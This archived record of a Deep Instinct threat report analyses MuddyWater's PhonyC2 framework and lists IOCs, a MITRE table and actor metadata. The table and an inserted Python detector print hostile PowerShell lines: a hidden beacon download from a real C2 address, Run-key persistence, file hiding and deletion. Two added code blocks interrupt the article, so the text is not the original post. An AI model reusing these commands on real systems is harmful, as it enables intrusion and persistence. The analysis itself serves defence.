{
	"id": "7a04c5db-a9b5-4c32-bcec-904c68e92af8",
	"created_at": "2026-04-06T00:10:34.864899Z",
	"updated_at": "2026-04-10T03:34:22.4835Z",
	"deleted_at": null,
	"sha1_hash": "ed10a313a617e03120050d08eee67f2644a88608",
	"title": "PhonyC2: Revealing a New Malicious Command \u0026 Control Framework by MuddyWater | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3325997,
	"plain_text": "PhonyC2: Revealing a New Malicious Command \u0026 Control Framework by MuddyWater | Deep Instinct\r\nBy Simon Kenin, Threat Intelligence Researcher, Deep Instinct Threat Lab\r\nPublished: 2023-06-29 · Archived: 2026-04-02 12:41:33 UTC\r\nMuddyWater, also known as Mango Sandstorm (Mercury), is a cyber espionage group that is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).\r\nExecutive summary:\r\nDeep Instinct’s Threat Research team has identified a new C2 (command \u0026 control) framework\r\nThe C2 framework is custom made, continuously in development, and has been used by the MuddyWater group since at least 2021\r\nThe framework is named PhonyC2 and was used in the attack on the Technion Institute\r\nPhonyC2 is currently used in an active PaperCut exploitation campaign by MuddyWater\r\nPhonyC2 is similar to MuddyC3, a previous C2 framework created by MuddyWater\r\nMuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection, as can be seen throughout the blog and in the investigation of the leaked code of PhonyC2. MuddyWater uses social engineering as its primary initial access vector, which lets it infect fully patched systems. Organizations should continue to harden systems and monitor for PowerShell activity.\r\nBackground\r\nIn April 2023, Deep Instinct’s threat research team identified three malicious PowerShell scripts that were part of an archive called PhonyC2_v6.zip.\r\nNote: V6 is the name of the folder found on the server. Since this is not an official C2 framework, there is no changelog or version history. The framework has changed over time, but we do not know the internal version numbers. Therefore, we refer to other versions by unique identifiers rather than version numbers.\r\nThe filename piqued our interest and we set out to discover whether it was a known C2 framework. 
After a quick investigation, it was revealed that the C2 framework had been found by Sicehice on a server with an open directory listing.\r\nFigure 1: Image of files located on the server\r\nNote: Sicehice is an organization that automates the collection of cyber threat intelligence from over 30 sources and enables users to search against the collected IPs.\r\nThere was no previous information regarding PhonyC2 and, as the zip file contained the source code, we decided to analyze the code to further understand this C2 framework.\r\nOur initial investigation revealed that the server which hosted the C2 is related to infrastructure that was used by MuddyWater in the attack against the Technion.\r\nFurther research revealed additional connections to MuddyWater infrastructure, including the ongoing PaperCut exploitation and previous attacks using earlier versions of the C2 framework.\r\nExposed Server Analysis\r\nIn addition to the PhonyC2 zip file, Sicehice uploaded additional files found on the server, including the “.bash_history” file, which revealed the commands the threat actors ran on the server:\r\nFigure 2: Start of .bash_history file\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 1 of 11\n\nFigure 3: End of .bash_history file\r\nIn figure 1 we can see the presence of “Ligolo,” another tool that is known to be used by MuddyWater.\r\nIn figure 2, commands related to PhonyC2 are marked in red.\r\nIn figure 2 and figure 3, marked in blue, are additional IP addresses that the threat actor used. 
Both addresses are mentioned as C2 servers in the report Microsoft published about their findings from the Technion attack, which they attributed to MuddyWater.\r\nOpen-source tools are marked in orange; FRP is known to be used by several Iranian threat groups, and Chisel has so far only been reported in use by MuddyWater, although that does not make it exclusive to them.\r\nAdditionally, in Figure 3, we can see another tunneling tool named “bore” that has not previously been reported to be in use by MuddyWater.\r\nThe combination of known MuddyWater tools present on the server and the fact that the threat actor communicated with two IP addresses known to be used by MuddyWater raised the suspicion that PhonyC2 is a framework used by MuddyWater.\r\nTaking a Closer Look: Code Analysis\r\nTo better understand the PhonyC2 framework, we looked at the source code. As we can see in figure 2 above, the first file of interest is “Please_Run_Once.py”:\r\nFigure 4: Please_Run_Once.py code\r\nThe script creates a unique config file in which the IP address, the port the C2 framework listens on for connections, and an extension for a decoy must be specified, as seen in line 5 of figure 4. Additionally, the script adds random UUIDs (Universally Unique Identifiers) to the config.py file, which makes tracking the URLs of the C2 framework less trivial.\r\nAn example of a config.py file:\r\nFigure 5: Example of config.py with random UUIDs in lines 13-20\r\nFigure 6: Additional information from config.py\r\nIn figure 6 the config file contains various PowerShell commands, which are the different payloads used by the framework.\r\nThe main.py file is small and starts a multi-threaded webserver and a command line listener. 
From this code we see that the name “PhonyC2” is used internally:\r\nFigure 7: main.py contents\r\nThe webserver.py file is responsible for serving the C2 framework payloads:\r\nFigure 8: Part of webserver.py code\r\nFigure 8 shows remnants of previous iterations of the framework in the commented-out route names, which have been replaced in this iteration with the random UUIDs from the config.py file (lines 13-20 in Figure 5).\r\nCommandline.py receives commands from the operator and prints the output of the various actions taken by the C2:\r\nFigure 9: Part of commandline.py\r\nFigure 9 and Figure 5 show the code referencing files named “C:\\programdata\\db.sqlite” and “db.ps1.” Both of those files are mentioned with the same name and path in Microsoft’s report about the Technion hack.\r\nWhile the malicious files from Microsoft’s report are not publicly available for inspection, the combination of the IP addresses related to PhonyC2 appearing in Microsoft’s report together with those file names makes a strong argument that the PhonyC2 framework was used in the attack on the Technion. 
Additionally, the files created by the C2 framework are detected as “PowerShell/Downloader.SB,” the same detection name Microsoft used in their blog.\r\nSince both files are dynamically generated by the C2 framework, they differ slightly in each execution of the framework; therefore, blocking the hashes Microsoft provided is not exhaustive.\r\nHow It Works\r\nFigure 10: PhonyC2 commands\r\nWhile it might look like there are many options and outputs, the C2 is actually simple once we understand what the code does.\r\nThis C2 is a post-exploitation framework used to generate various payloads that connect back to the C2 and wait for instructions from the operator to conduct the final step of the “Intrusion Kill Chain.”\r\n“payload” Command:\r\nFigure 11: “payload” command output\r\nIn figure 11 we see a step-by-step explanation of what happens:\r\n1. A PowerShell command makes an HTTP request to the C2 to receive an encoded file and saves it as “c:\\programdata\\db.sqlite”\r\n2. A PowerShell command writes the base64-decoded content to “c:\\programdata\\db.ps1”\r\nFigure 12: The content of db.ps1\r\n3. 
A PowerShell command executes db.ps1, which in turn reads and decodes db.sqlite and executes the result in memory.\r\nEssentially, this is a one-liner to execute on a compromised host so that it beacons back to the C2.\r\nExample Decode Routine\r\nAs previously mentioned, the files generated by the C2 are slightly different each time; however, the decoding logic remains mostly the same.\r\nBelow is an example of db.sqlite content and a diagram explaining the decoding routine:\r\nFigure 13: HTML response from C2 server for step #1\r\nFigure 14: Decode routine flow (values might change in different executions)\r\n“dropper” Command:\r\nThis command creates different variants of PowerShell commands for step (1) only.\r\nFigure 15: “dropper” command output\r\n“Ex3cut3” Command:\r\nThis command creates different variants of PowerShell commands for steps (2) and (3) combined:\r\nFigure 16: “Ex3cut3” command output\r\n“list” Command:\r\nThe list command shows all the computers connected to the C2 with some associated information:\r\nFigure 17: “list” command output\r\n“setcommandforall” Command:\r\nThis command is the most important one, as it allows the threat actor to execute the same command on all the connected computers at the same time. 
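The payload chain above, together with the hide, clean-up and persistence observables collected in the MITRE table at the end of this post, leaves a small set of artifacts that stay constant even though db.sqlite and db.ps1 differ on every run. The following Python detector is an added example, not code from the original post or from the PhonyC2 framework: it scores constructed PowerShell command lines and a proxy URL against those artifacts. The regexes, weights and threshold, the 8-16 letter bound on the random registry names, the check that the query value echoes the parameter name (seen only in the one route URL the post shows) and the -Uri/-OutFile tail of the first sample line are all assumptions of the example.

```python
import re
from dataclasses import dataclass, field

# Indicator strings come from the observables the post lists for PhonyC2 V6
# (db.sqlite / db.ps1 staging, attrib +h, hidden-window launch, utils.jse Run
# key, HKLM:SOFTWARE\<random> value, UUID-named .html route). The regexes,
# weights and threshold are assumptions of this example, not PhonyC2 code.

@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern
    weight: int

RULES = [
    Rule('hidden_window_launch', 'T1564.003',
         re.compile(r'powershell(?:\.exe)?\s.*-EP\s+BYPASS\s+-NoP\s+-W\s+1\b', re.I), 2),
    Rule('iwr_default_creds', 'T1071.001',
         re.compile(r'Invoke-WebRequest\s+-UseDefaultCredentials\s+-UseBasicParsing', re.I), 2),
    Rule('staging_files', 'T1105',
         re.compile(r'c:\\programdata\\db\.(?:sqlite|ps1)\b', re.I), 3),
    Rule('hide_staging_file', 'T1564.001',
         re.compile(r'attrib\s+\+h\s+c:\\programdata\\', re.I), 2),
    Rule('cleanup_staging', 'T1070.004',
         re.compile(r'\brm\s+c:\\programdata\\db\.sqlite\s*;\s*rm\s+c:\\programdata\\db\.ps1', re.I), 3),
    Rule('run_key_utils_jse', 'T1547.001',
         re.compile(r'CurrentVersion\\Run\b.*\bC:\\intel\\utils\\utils\.jse', re.I), 4),
    Rule('registry_payload_store', 'T1112',
         # key and value names are random letters (iCXqExISMHV / fmoopWgmBla in
         # the post); the 8-16 letter bound is an assumption of this example
         re.compile(r'New-ItemProperty\s+-Path\s+"HKLM:SOFTWARE\\[A-Za-z]{8,16}"', re.I), 3),
    Rule('c2_uuid_route', 'T1071.001',
         re.compile(r'/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.html\?[A-Z0-9]+=[A-Z0-9]+'), 3),
]

# Query string of the UUID route, used for the corroborating check below.
ROUTE_QUERY = re.compile(r'\.html\?([A-Z0-9]+)=([A-Z0-9]+)')

@dataclass
class Finding:
    event: str
    score: int = 0
    matched: list = field(default_factory=list)   # (rule name, ATT&CK technique)

def score_event(text: str) -> Finding:
    """Score one command line, script block or URL against the PhonyC2 rules."""
    f = Finding(event=text)
    for rule in RULES:
        if rule.pattern.search(text):
            f.matched.append((rule.name, rule.technique))
            f.score += rule.weight
    # In the one route URL the post shows, the query value is a prefix of the
    # parameter name (X9GFTRD6OZE=X9GFTR). Whether every generated route does
    # this is unknown, so it only adds a low-weight corroboration.
    m = ROUTE_QUERY.search(text)
    if m and m.group(1) != m.group(2) and m.group(1).startswith(m.group(2)):
        f.matched.append(('query_value_echoes_key', 'T1071.001'))
        f.score += 1
    return f

def triage(events, threshold=3):
    """Return findings at or above the threshold, highest score first."""
    hits = [score_event(e) for e in events]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)

# Constructed sample telemetry (not captured data), modelled on the observables
# in the post's MITRE table. The -Uri/-OutFile tail of the first line is a
# reconstruction: the post's own observable is truncated after "-U".
SAMPLE_EVENTS = [
    'powershell -EP BYPASS -NoP -W 1 Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing '
    '-Uri http://46.249.35.243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTR '
    '-OutFile c:\\programdata\\db.sqlite ; attrib +h c:\\programdata\\db.sqlite}',
    'rm c:\\programdata\\db.sqlite ; rm c:\\programdata\\db.ps1',
    'reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NEW /d C:\\intel\\utils\\utils.jse /f',
    'New-ItemProperty -Path "HKLM:SOFTWARE\\iCXqExISMHV" -Name "fmoopWgmBla" -Value \'$p\'',
    'powershell Get-ChildItem C:\\Users -Recurse | Measure-Object',   # benign control
]

if __name__ == '__main__':
    for hit in triage(SAMPLE_EVENTS):
        print(hit.score, [name for name, _ in hit.matched], hit.event[:60])
```

The first sample line matches six rules at once, which is the point of scoring rather than alerting on any single string: the individual pieces (a hidden window, Invoke-WebRequest with default credentials, a file under ProgramData) each occur in benign administration, but their co-occurrence with a UUID-named .html route does not. The Run key and registry-value rules fire on the persistence steps alone, so the persistence chain is caught even when the initial beacon was not logged.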
With “setcommandforall” the operator could, for example, push a command that downloads and executes a ransomware payload on every connected host.\r\nFigure 18: “setcommandforall” command output\r\n“use” Command:\r\nThis command allows the threat actor to get a PowerShell shell on a specific computer:\r\nFigure 19: “use” command output\r\nIf the “use” command is selected, additional commands become available:\r\nFigure 20: Additional command options after selecting “use”\r\n“persist” and Other Commands:\r\nMost of these additional commands are self-explanatory; the only interesting one is “persist.”\r\nFigure 21: “persist” command output\r\nThe “persist” command generates PowerShell code that gives the operator persistence on the infected host, so that it connects back to the C2 if the host is restarted.\r\nAdditionally, when the operator executes the “persist” command, the C2 writes an encrypted payload to a pre-defined random registry path under “HKLM\\Software.” This can be partially seen in commandline.py (figure 22), as some of the values are stored in config.py.\r\nThe encrypted payload is a slightly modified version of “persist_payload_2022.ps1,” the file that triggered the entire investigation.\r\nFigure 22: Code related to persistence from commandline.py\r\nBelow is the full chain PhonyC2 uses to achieve persistence:\r\nBy executing “persist” on a machine connected to PhonyC2, the C2 writes the encrypted payload to the registry\r\nAdd a Run key to the Windows registry that executes a script file named utils.jse located in the C:\\intel\\utils\\ directory at startup\r\nCreate the directory c:\\intel\\utils\\ if it does not exist\r\nChange the current directory to c:\\intel\\utils\\\r\nDecode a base64 blob and write it into utils.jse\r\nFigure 23: Contents of utils.jse (some values change in each 
execution)\r\nCreate a registry value with a random name (fmoopWgmBla) under a random key HKLM:\\SOFTWARE\\\u003crandom\u003e (iCXqExISMHV), with content similar to the following:\r\nFigure 24: Content written to the registry with analysis comments\r\nWhen the computer is rebooted, the Run key causes the execution of the utils.jse script\r\nThe utils.jse script reads and executes the contents of the registry value, as seen in figure 23\r\nThe PowerShell code in figure 25 connects to the C\u0026C server to receive and execute code similar to the following:\r\nFigure 25: Input is base64 returned from the server\r\nThe base64-decoded script reads and decrypts another payload from the registry. This payload is based on “persist_payload_2022.ps1.”\r\nInfection Flow\r\nFigure 26: Infection flow of PhonyC2\r\nAttribution\r\nThe current version of PhonyC2 is written in Python3. It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework that was written in Python2.\r\nFigure 27: MuddyC3 output, see figure 10; similarities with PhonyC2\r\nWith the knowledge we gathered from investigating the source code of PhonyC2, we believe that PhonyC2 is a successor to MuddyC3 and POWERSTATS.\r\nWe investigated prior MuddyWater intrusions to identify when PhonyC2 was first used and found that on November 29, 2021, the IP address 87.236.212[.]22 responded with an obfuscated payload which we believe is an early variant of PhonyC2 written in Python2. 
As evidence, figure 4 shows comments left by the threat actor requesting code changes for the script to work with Python3.\r\nThe obfuscated payload was saved to a file named “data.sqlite,” which is remarkably similar to the file name used in PhonyC2. In addition, the obfuscated payload uses the same comma-separated delimiter found in the current PhonyC2 payloads, although the decoding routine differs from the most recent one.\r\nIn figures 6 and 8 the string “apiy7” is commented out in the code. We found a submission of a URL from March 2022 containing that string, meaning this was a PhonyC2 server, but with an earlier version than the current V6 described in this blog.\r\nThe IP address of this URL is 137.74.131[.]30. It is mentioned in the Group-IB report as having \"ETag 2aa6-5c939a3a79153.\"\r\n178.32.30[.]3 is another IP address that had both the “apiy7” string and \"ETag 2aa6-5c939a3a79153.\" It is also referenced in a blog by Talos detailing MuddyWater activity, published in March. However, we can’t confirm whether that activity is related to PhonyC2. The first confirmation of PhonyC2 on this server is a URL scan from August which contained the “apiy7” string.\r\nThe same IP address had another scan in August, which revealed a custom error message that in turn revealed additional PhonyC2 servers. Pivoting from those servers, we were able to find further PhonyC2 servers with the string “apiv4” from March 2022 through May 2022 that pre-date the “apiy7” PhonyC2 version.\r\nThe IP address 91.121.240[.]104 contained both the “apiy7” string and \"ETag 2aa6-5c939a3a79153.\" It was confirmed by Microsoft as an IP address used by MuddyWater to exploit the log4j vulnerability in the Israeli SysAid software, confirming that PhonyC2 was used in those attacks as well.\r\nDuring our research we uncovered PhonyC2 servers with different ETag values or no ETag at all. 
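The ETag pivot used above works because of how the value is built. Assuming the PhonyC2 hosts ran Apache httpd with its default FileETag setting (an assumption; the post does not name the web server), the ETag is the served file's size and last-modified time, both in hex, with the mtime at microsecond resolution, so two hosts only share it when they serve a byte-identical file carrying the same timestamp, which is exactly what a cloned VPS image produces. The following Python helper is an added example, not part of the original post: it parses such ETags and groups the hosts listed in the post's IOC table by shared value.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Assumption of this example: Apache httpd's default "FileETag MTime Size"
# layout, i.e. "<size hex>-<mtime hex, microseconds>", optionally preceded by
# "<inode hex>-" when INode is enabled, optionally weak (W/) and quoted.
# Other servers (nginx, IIS) build ETags differently and will not parse.
ETAG_RE = re.compile(r'^(?P<weak>W/)?"?(?P<body>[0-9a-f]+(?:-[0-9a-f]+){1,2})"?$', re.I)

def parse_apache_etag(etag: str):
    """Return {'inode','size','mtime_us','mtime_utc'} for an Apache-style ETag, else None."""
    m = ETAG_RE.match(etag.strip())
    if not m:
        return None
    parts = [int(p, 16) for p in m.group('body').split('-')]
    inode = parts[0] if len(parts) == 3 else None
    size, mtime_us = parts[-2], parts[-1]
    mtime = datetime.fromtimestamp(mtime_us // 1_000_000, tz=timezone.utc)
    return {'inode': inode, 'size': size, 'mtime_us': mtime_us,
            'mtime_utc': mtime.strftime('%Y-%m-%dT%H:%M:%SZ')}

def group_by_etag(observations):
    """observations: iterable of (host, etag or None).
    Returns {etag: sorted hosts} for values seen on more than one host,
    the candidates for a duplicated server image."""
    groups = defaultdict(set)
    for host, etag in observations:
        if etag:
            groups[etag].add(host)
    return {e: sorted(h) for e, h in groups.items() if len(h) > 1}

# Hosts and ETag values as given in the post's IOC table (defanging removed).
OBSERVED = [
    ('91.121.240.104', '2aa6-5c939a3a79153'),
    ('137.74.131.30', '2aa6-5c939a3a79153'),
    ('137.74.131.24', '2aa6-5c939a3a79153'),
    ('178.32.30.3', None),
]

if __name__ == '__main__':
    print(parse_apache_etag('2aa6-5c939a3a79153'))
    print(group_by_etag(OBSERVED))
```

On the ETag from the post this yields a 10918-byte file last modified 2021-08-10 19:37:59 UTC. 10918 bytes is the size of the default apache2 index.html on Ubuntu images, so the shared value is plausibly the stock landing page carrying the install-time mtime of a common base image rather than anything the operators wrote, which is why the pivot identifies the image, not the operator, and loses value as soon as the provider rotates it.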
We suspect that servers sharing the same ETag value originate from duplication of the server image by the VPS provider. Therefore, this pivot might work occasionally but will mostly be of value for historical purposes.\r\nAs we mentioned in the “Exposed Server Analysis” section, Figure 2 and Figure 3 contain two IP addresses, 194.61.121[.]86 and 45.86.230[.]20, that were confirmed by Microsoft as MuddyWater C2 servers used in the Technion hack. While we can’t confirm whether 45.86.230[.]20 was running PhonyC2, both 46.249.35[.]243 and 194.61.121[.]86, which are listed in Microsoft’s report, were hosting PhonyC2 V6 based on URL patterns we have seen in the Python source code.\r\nAnother interesting commonality we have observed in MuddyWater’s operations is the use of “core.” In MuddyC3 there is a directory named “core” and in PhonyC2 there is a directory called “isnotcore.” “core” is also referenced several times in the code (see figures 4-8). From our analysis, the PowGoop C2 servers had a URL pattern of “Core?Token=.” We suspect that one of the servers running PowGoop, 164.132.237[.]79, might still be controlled by MuddyWater. This IP is currently running a Metasploit server, which MuddyWater is known to use.\r\nPassive DNS resolution of this IP shows the domain 6nc110821hdb[.]co. This domain was also resolving to two other PowGoop servers:\r\nFigure 28: Passive DNS resolution for 6nc110821hdb[.]co\r\nBoth of those servers, 51.255.19[.]178 and 51.255.19[.]179, were hosting SimpleHelp according to Group-IB. Group-IB also listed many IPs from the 164.132.237.64/28 subnet as SimpleHelp servers, which makes it clear that 164.132.237[.]79 is somehow related to MuddyWater activity as well. 
The 6nc110821hdb[.]co domain name looked rather suspicious, and after further investigation we found an interesting pattern:\r\n\u003c3 letters\u003e\u003c1 digit\u003e[dot]6nc\u003cdate\u003e\u003coptional 2 letters\u003e\u003coptional incremented letter\u003e[dot]co\r\nWe detected the following domain names that still have active hosts resolving in passive DNS:\r\n6nc051221a[.]co\r\n6nc051221c[.]co\r\n6nc110821hdb[.]co\r\n6nc060821[.]co\r\n6nc220721[.]co\r\nWe suspect that those domains represent infrastructure registered in 2021 by MuddyWater that is still active today.\r\nThere are additional domains where we did not find active infrastructure, such as 6nc051221b[.]co and 6nc110821hda[.]co. In the past, the latter resolved to known MuddyWater infrastructure. “6nc” could be read as C\u0026C (six and C), an abbreviation of “Command and Control.”\r\nAt the beginning of May 2023, a Microsoft Twitter post mentioned they had observed MuddyWater exploiting CVE-2023-27350 in the PaperCut print management software. While they did not share any new indicators, they noted that MuddyWater was “using tools from prior intrusions to connect to their C2 infrastructure” and referenced their blog on the Technion hack, which we already established was using PhonyC2. Around the same time, Sophos published indicators from various PaperCut intrusions they had seen. Deep Instinct found that two IP addresses from those intrusions are PhonyC2 servers, based on URL patterns.\r\n1) 185.254.37[.]173\r\nThis IP address was also hosting various payloads. While we could not retrieve most of them, we were able to capture the directory listing of the server in Censys.\r\nFigure 29: Directory listing of 185.254.37[.]173\r\nThe file named eh.msi was uploaded to VirusTotal. 
This file is an installer for the eHorus remote access tool. The exact same\r\nfile was also mentioned by Mandiant as being used by a cluster of activity that overlaps with MuddyWater. Additionally, the\r\nuse of eHorus software by MuddyWater was observed by Microsoft and Symantec.\r\n2) 45.159.248[.]244\r\nIn this instance of PhonyC2, MuddyWater decided to use Port 53 for the server, which is normally reserved for DNS use.\r\nThis shows yet another attempt by MuddyWater to change their TTPs and conceal their malicious activity.\r\nThis is also the third overlap of PhonyC2 intersecting with Microsoft’s reporting on MuddyWater activity.\r\nLooking Ahead\r\nMuddyWater is continuously updating the C2 and changing TTPs to avoid detection, as can be seen throughout the blog, and\r\nin the investigation of the leaked code of PhonyC2.\r\nDeep Instinct has already observed a suspected instance of PhonyC2 that is using a newer code version than V6 that was\r\nleaked in a URL scan on the IP 195.20.17[.]44:\r\nFigure 30: URL Scan of newer than V6 PhonyC2\r\nThe part of the URL that is marked in red has been changed since PhonyC2 V6, the use of UUIDs has been changed, and the\r\n“go” extension was added. The second part of the URL in green has not been changed from the V6 code.\r\nThe response to this scan is the following payload.\r\nhttps://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater\r\nPage 8 of 11\n\nFigure 31: New PhonyC2 payload (see Figure 13 reference)\r\nWhile the encoded payload (green) looks similar to what we have seen in V6, MuddyWatter added a benign HTML code\r\n(red) to further conceal their activities. In PhonyC2 V6, the server response was solely the encoded payload without any\r\nHTML. 
Furthermore, the IP address 195.20.17[.]44 is located in Israel, and we suspect this location was chosen on purpose so that the network traffic blends in during targeted attacks against Israeli organizations.\r\nWhile examining the 195.20.17.0/24 subnet of this newer PhonyC2 server, we observed many IP addresses related to cybercrime. However, one of the IP addresses, 195.20.17[.]183, had a passive DNS response of am1211.iransos[.]me. While we cannot confirm this IP address is related to MuddyWater, we suspect that the whole subnet is leased to an Iranian VPS provider used by MuddyWater.\r\nYou can find the source code of PhonyC2 and the IOCs on our GitHub page.\r\nMITRE:\r\nTactic | Technique | Description | Observable\r\nCommand and Control | T1071.001 Application Layer Protocol: Web Protocols | PhonyC2 uses HTTP to download the obfuscated payload | http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTR\r\nCommand and Control | T1132.002 Data Encoding: Non-Standard Encoding | The PhonyC2 payload is obfuscated using a custom encoding | ,15555554155555554,14((1414,1554(14(,1554(14(,15415554,1554(14(,1414(,154((154,154154((,155\r\nCommand and Control | T1105 Ingress Tool Transfer | PhonyC2 has the ability to download payloads from the C2 server | http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTR\r\nPersistence | T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | PhonyC2 has the ability to add a persistence mechanism | reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NEW /d C:\\intel\\utils\\utils.jse /f\r\nExecution | T1059.001 Command and Scripting Interpreter: PowerShell | PhonyC2 is executed by PowerShell and executes PowerShell commands | powershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -U\r\nDefense Evasion | T1564.001 Hide Artifacts: Hidden Files and Directories | PhonyC2 sets the hidden attribute on files in C:\\ProgramData | attrib +h c:\\programdata\\db.sqlite\r\nDefense Evasion | T1564.003 Hide Artifacts: Hidden Window | PhonyC2 is executed with a hidden PowerShell window | powershell -EP BYPASS -NoP -W 1\r\nDefense Evasion | T1070.004 Indicator Removal: File Deletion | PhonyC2 deletes its files after execution | rm c:\\programdata\\db.sqlite ; rm c:\\programdata\\db.ps1\r\nDefense Evasion | T1112 Modify Registry | PhonyC2 creates registry entries to achieve persistence | New-ItemProperty -Path \"HKLM:SOFTWARE\\iCXqExISMHV\" -Name \"fmoopWgmBla\" -Value '$p\r\nIOC:\r\nIP Address | Description\r\n45.159.248[.]244 | PhonyC2 V6 (PaperCut)\r\n91.121.240[.]104 | \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153 (log4j)\r\n195.20.17[.]44 | Suspected PhonyC2 V7\r\n45.86.230[.]20 | MuddyWater infrastructure related to PhonyC2 activity (DarkBit Technion)\r\n137.74.131[.]30 | \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153\r\n178.32.30[.]3 | \"apiy7\" PhonyC2\r\n137.74.131[.]24 | \"apiv4\" and/or \"apiy7\" PhonyC2 with ETag 2aa6-5c939a3a79153\r\n46.249.35[.]243 | PhonyC2 V6 (DarkBit Technion)\r\n185.254.37[.]173 | PhonyC2 V6 (PaperCut)\r\n194.61.121[.]86 | PhonyC2 V6 (DarkBit Technion)\r\n87.236.212[.]22 | Suspected first version of PhonyC2\r\n91.235.234[.]130 | PhonyC2 V6.zip\r\n157.90.153[.]60 | \"apiv4\" PhonyC2\r\n157.90.152[.]26 | \"apiv4\" PhonyC2\r\n65.21.183[.]238 | \"apiv4\" PhonyC2\r\n45.132.75[.]101 | Suspected MuddyWater infrastructure (edc1.6nc051221c[.]co)\r\n51.255.19[.]178 | Suspected MuddyWater infrastructure (pru2.6nc110821hdb[.]co)\r\n103.73.65[.]129 | Suspected MuddyWater infrastructure (nno1.6nc060821[.]co)\r\n103.73.65[.]225 | Suspected MuddyWater infrastructure (nno3.6nc060821[.]co)\r\n103.73.65[.]244 | Suspected MuddyWater infrastructure (kwd1.6nc220721[.]co)\r\n103.73.65[.]246 | Suspected MuddyWater infrastructure (kwd2.6nc220721[.]co)\r\n103.73.65[.]253 | Suspected MuddyWater infrastructure (kwd3.6nc220721[.]co)\r\n137.74.131[.]16 | Suspected MuddyWater infrastructure (qjk1.6nc051221c[.]co)\r\n137.74.131[.]18 | Suspected MuddyWater infrastructure (qjk2.6nc051221c[.]co)\r\n137.74.131[.]25 | Suspected MuddyWater infrastructure (qjk3.6nc051221c[.]co)\r\n164.132.237[.]67 | Suspected MuddyWater infrastructure (tes2.6nc051221a[.]co)\r\n164.132.237[.]79 | Suspected MuddyWater infrastructure (pru1.6nc110821hdb[.]co)\r\nSamples of files generated by the framework (non-exhaustive):\r\nSHA256 | Description\r\n7cb0cc6800772e240a12d1b87f9b7561412f44f01f6bb38829e84acbc8353b9c | db.ps1\r\n5ca26988b37e8998e803a95e4e7e3102fed16e99353d040a5b22aa7e07438fea | db.sqlite\r\n1c95496da95ccb39d73dbbdf9088b57347f2c91cf79271ed4fe1e5da3e0e542a | utils.jse\r\n2f14ce9e4e8b1808393ad090289b5fa287269a878bbb406b6930a6c575d1f736 | db.ps1\r\nb4b3c3ee293046e2f670026a253dc39e863037b9474774ead6757fe27b0b63c1 | db.sqlite\r\nb38d036bbe2d902724db04123c87aeea663c8ac4c877145ce8610618d8e6571f | utils.jse",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater"
	],
	"report_names": [
		"phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
